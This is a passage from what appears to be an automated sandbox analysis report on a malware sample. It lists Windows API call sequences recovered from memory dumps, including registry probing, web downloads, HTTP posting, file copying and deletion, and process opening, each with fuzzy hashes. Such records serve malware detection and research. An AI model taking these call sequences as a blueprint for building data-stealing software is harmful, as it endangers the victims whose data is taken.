                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 00B378F6
                                                  • lstrcat.KERNEL32(0064A668,00421804), ref: 00B37907
                                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 00B3793A
                                                  • lstrcat.KERNEL32(0064A668,00421808), ref: 00B37954
                                                  • task.LIBCPMTD ref: 00B37962
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                  • String ID:
                                                  • API String ID: 2677904052-0
                                                  • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                  • Instruction ID: bf5a135a1c4531568b8d4bc1f5e206b47d5e14167d6413c6106c55171efe19b3
                                                  • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                  • Instruction Fuzzy Hash: 52315EB9A40209EFDB04FBE0DC95DFE77BAEB55301F205158F10267290DE34A942CB62
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B35231
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B35238
                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00B35251
                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B35278
                                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B352A8
                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 00B352F1
                                                  • InternetCloseHandle.WININET(?), ref: 00B35320
                                                  • InternetCloseHandle.WININET(?), ref: 00B3532D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                  • String ID:
                                                  • API String ID: 1008454911-0
                                                  • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                  • Instruction ID: 7a921da1c0686c682e011d7e0fca7f9bf68118ffb45a2d49316a656dccf07caa
                                                  • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                  • Instruction Fuzzy Hash: 0A3118B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081D9FA09A7281D7706EC58F99
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                  • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                  • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                  • InternetCloseHandle.WININET(?), ref: 004050C6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                  • String ID:
                                                  • API String ID: 3894370878-0
                                                  • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                  • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                  • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                  • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                  APIs
                                                    • Part of subcall function 00B4AA87: lstrlen.KERNEL32(00B3516C,?,?,00B3516C,00420DDE), ref: 00B4AA92
                                                    • Part of subcall function 00B4AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B4AAEC
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 00B458AB
                                                  • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 00B45908
                                                  • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 00B45ABE
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B45457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 00B4548F
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B45527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B4557F
                                                    • Part of subcall function 00B45527: lstrlen.KERNEL32(00000000), ref: 00B45596
                                                    • Part of subcall function 00B45527: StrStrA.SHLWAPI(00000000,00000000), ref: 00B455CB
                                                    • Part of subcall function 00B45527: lstrlen.KERNEL32(00000000), ref: 00B455EA
                                                    • Part of subcall function 00B45527: strtok.MSVCRT(00000000,?), ref: 00B45605
                                                    • Part of subcall function 00B45527: lstrlen.KERNEL32(00000000), ref: 00B45615
                                                  • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 00B459F2
                                                  • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 00B45BA7
                                                  • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 00B45C73
                                                  • Sleep.KERNEL32(0000EA60), ref: 00B45C82
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                  • String ID:
                                                  • API String ID: 3630751533-0
                                                  • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                  • Instruction ID: d7a9359cc0169783801c9b4a74dde711d959d0d493453da57e9e2579c0c01f18
                                                  • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                  • Instruction Fuzzy Hash: C5E172B1940608ABCB18FBA4DD92EED73B9AF55300F5081ACF54666092EF346F48DB52
                                                  APIs
                                                  • memset.MSVCRT ref: 00B3158E
                                                    • Part of subcall function 00B31507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3151B
                                                    • Part of subcall function 00B31507: RtlAllocateHeap.NTDLL(00000000), ref: 00B31522
                                                    • Part of subcall function 00B31507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B3153E
                                                    • Part of subcall function 00B31507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B3155C
                                                    • Part of subcall function 00B31507: RegCloseKey.ADVAPI32(?), ref: 00B31566
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B315B6
                                                  • lstrlen.KERNEL32(?), ref: 00B315C3
                                                  • lstrcat.KERNEL32(?,004262EC), ref: 00B315DE
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B48DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B31660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B48DED
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B316CC
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B39C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B39C53
                                                    • Part of subcall function 00B39C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B39C78
                                                    • Part of subcall function 00B39C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B39C98
                                                    • Part of subcall function 00B39C27: ReadFile.KERNEL32(000000FF,?,00000000,00B316F6,00000000), ref: 00B39CC1
                                                    • Part of subcall function 00B39C27: LocalFree.KERNEL32(00B316F6), ref: 00B39CF7
                                                    • Part of subcall function 00B39C27: CloseHandle.KERNEL32(000000FF), ref: 00B39D01
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B31756
                                                  • memset.MSVCRT ref: 00B3177D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                  • String ID:
                                                  • API String ID: 3885987321-0
                                                  • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                  • Instruction ID: 13252cc1e3b2ee9dd1cc1c00313c98968ff4aeea65ce4c49aebdfdc908663c5b
                                                  • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                  • Instruction Fuzzy Hash: 73513FB19902189BCB15FB64DD92FED73BCEF54700F4045E8B64A62082EE705B89CF56
                                                  APIs
                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                  • wsprintfA.USER32 ref: 00418459
                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • RegQueryValueExA.ADVAPI32(00000000,00879510,00000000,000F003F,?,00000400), ref: 004184EC
                                                  • lstrlenA.KERNEL32(?), ref: 00418501
                                                  • RegQueryValueExA.ADVAPI32(00000000,00879600,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                  • String ID: %s\%s
                                                  • API String ID: 3896182533-4073750446
                                                  • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                  • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                  • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                  • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A51
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A68
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A7F
                                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B34AA0
                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00B34AB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$CrackInternetlstrlen
                                                  • String ID: <
                                                  • API String ID: 1683549937-4251816714
                                                  • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                  • Instruction ID: 3624d3ba4008c594f4e45307cbd3457537e3b1815dfe09a62187662b737ab62c
                                                  • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                  • Instruction Fuzzy Hash: 36215BB5D00219ABDF10EFA4EC49AED7BB4FF04320F108225F925A7290EB706A05CF91
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B4790B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B47912
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 00B47944
                                                  • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 00B47965
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B4796F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID: Windows 11
                                                  • API String ID: 3225020163-2517555085
                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction ID: 717e449baf21ff97fc1661cb6d3b850ee0a79018b636e8d3cb421c77661c769b
                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction Fuzzy Hash: B2012CB9A84204BBEB00DBE4DD49FADB7BDEB48701F105194BA0596281DB749A00DB51
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                  • RegOpenKeyExA.ADVAPI32(80000002,008462B8,00000000,00020119,00000000), ref: 004176DD
                                                  • RegQueryValueExA.ADVAPI32(00000000,00879270,00000000,00000000,?,000000FF), ref: 004176FE
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID: Windows 11
                                                  • API String ID: 3466090806-2517555085
                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                  • RegOpenKeyExA.ADVAPI32(80000002,008462B8,00000000,00020119,004176B9), ref: 0041775B
                                                  • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                  • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID: CurrentBuildNumber
                                                  • API String ID: 3466090806-1022791448
                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                  APIs
                                                  • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                  • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSize
                                                  • String ID: :A$:A
                                                  • API String ID: 1378416451-1974578005
                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B375A1
                                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B37618
                                                  • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B37674
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B376B9
                                                  • HeapFree.KERNEL32(00000000), ref: 00B376C0
                                                    • Part of subcall function 00B394A7: vsprintf_s.MSVCRT ref: 00B394C2
                                                  • task.LIBCPMTD ref: 00B377BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                  • String ID:
                                                  • API String ID: 700816787-0
                                                  • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                  • Instruction ID: b80c25703abb9249d7690db12b8a2c44e12a06541f49887ed74ebafbad952d1a
                                                  • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                  • Instruction Fuzzy Hash: 636117B59442689BDB24DB50CC85BE9B7F8BF48300F1081E9E649A6241DFB06FC9CF95
                                                  APIs
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B364E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B36548
                                                    • Part of subcall function 00B364E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 00B3656A
                                                    • Part of subcall function 00B364E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B3659C
                                                    • Part of subcall function 00B364E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B365EC
                                                    • Part of subcall function 00B364E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B36626
                                                    • Part of subcall function 00B364E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B36638
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B4557F
                                                  • lstrlen.KERNEL32(00000000), ref: 00B45596
                                                    • Part of subcall function 00B49097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B490B9
                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00B455CB
                                                  • lstrlen.KERNEL32(00000000), ref: 00B455EA
                                                  • strtok.MSVCRT(00000000,?), ref: 00B45605
                                                  • lstrlen.KERNEL32(00000000), ref: 00B45615
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                  • String ID:
                                                  • API String ID: 3532888709-0
                                                  • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                  • Instruction ID: acdc1b8e4df661b5c16027ee2e0e5997ef0d26ddd280818fe733ad7557e3bdb5
                                                  • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                  • Instruction Fuzzy Hash: 2D512DB0950248DBCB18FF68CE96FED77B5AF10700F9080A8F84666592DF346B45DB52
                                                  APIs
                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00B47345
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00B47574,004205BD), ref: 00B47383
                                                  • memset.MSVCRT ref: 00B473D1
                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B47525
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcesslstrcpymemset
                                                  • String ID:
                                                  • API String ID: 224852652-0
                                                  • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                  • Instruction ID: 1889a7b9d42d75de3e41691d0236ecf9206b8ed4ad45b7f627e903809e94a71c
                                                  • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                  • Instruction Fuzzy Hash: D9518CB0D442189BDB24EBA4CC85BEDB7B4EF54305F1080E8E205A6281EF746B88DF59
                                                  APIs
                                                  • memset.MSVCRT ref: 00B4433C
                                                  • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 00B4435B
                                                  • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 00B4437F
                                                  • RegCloseKey.ADVAPI32(?), ref: 00B44389
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B443AE
                                                  • lstrcat.KERNEL32(?,0064A168), ref: 00B443C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                  • String ID:
                                                  • API String ID: 2623679115-0
                                                  • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                  • Instruction ID: cfab7fe98591240459100d84c87bd71fcbcdaf11634beb5d91df6cf9bb1e75fa
                                                  • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                  • Instruction Fuzzy Hash: 1D41D7B6940108BBDB14FBE0DC46FEE77BDAB49300F04899CB61557180EA755B988BE2
                                                  APIs
                                                  • memset.MSVCRT ref: 004140D5
                                                  • RegOpenKeyExA.ADVAPI32(80000001,00879978,00000000,00020119,?), ref: 004140F4
                                                  • RegQueryValueExA.ADVAPI32(?,00879120,00000000,00000000,00000000,000000FF), ref: 00414118
                                                  • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                  • lstrcatA.KERNEL32(?,008790A8), ref: 0041415B
                                                  Memory Dump Source
